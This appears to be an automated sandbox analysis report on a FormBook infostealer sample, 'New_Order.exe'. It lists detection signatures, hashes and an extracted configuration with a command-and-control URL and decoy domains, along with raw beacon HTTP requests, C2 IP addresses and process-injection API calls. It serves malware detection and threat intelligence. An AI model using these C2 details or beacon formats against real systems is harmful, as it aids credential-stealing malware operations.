Analysis Report New_Order.exe

Overview

General Information

Sample Name:	New_Order.exe
Analysis ID:	411746
MD5:	74e4eb9afbf8f9c9b285a46ced831979
SHA1:	8d65df9dc971c859f0a86a158d9576f528603410
SHA256:	68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Dridex Process Pattern

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Suspicious Svchost Process

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll

ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Source: New_Order.exe	Virustotal: Detection: 38%			Perma Link
Source: New_Order.exe	ReversingLabs: Detection: 59%

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: New_Order.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.New_Order.exe.24e0000.4.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.svchost.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: New_Order.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: New_Order.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
Source:	Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
Source:	Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,		0_2_0040646B
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,		0_2_004058BF

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop esi	1_2_0041581A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi	1_2_0040C3EA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop esi	7_2_0062581A
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4x nop then pop edi	7_2_0061C3EA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.voiceclubdubai.com/icsm/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.year-action.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 75.2.115.196 75.2.115.196
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: TELEPOINTBG TELEPOINTBG

Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.roastedorganic.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 12 May 2021 04:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 253Connection: closeX-Varnish: 824312071Retry-After: 5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>

Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: New_Order.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New_Order.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp	String found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\New_Order.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040535C

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: New_Order.exe

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004181C0 NtCreateFile,	1_2_004181C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418270 NtReadFile,	1_2_00418270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004182F0 NtClose,	1_2_004182F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004183A0 NtAllocateVirtualMemory,	1_2_004183A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004181BA NtCreateFile,	1_2_004181BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004182EA NtClose,	1_2_004182EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041839B NtAllocateVirtualMemory,	1_2_0041839B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_03969A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,	1_2_03969A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk,	1_2_03969A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk,	1_2_039699A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_03969910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_039698F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk,	1_2_03969840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03969860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk,	1_2_03969780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_039697A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk,	1_2_03969FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk,	1_2_03969710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_039696E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_03969660
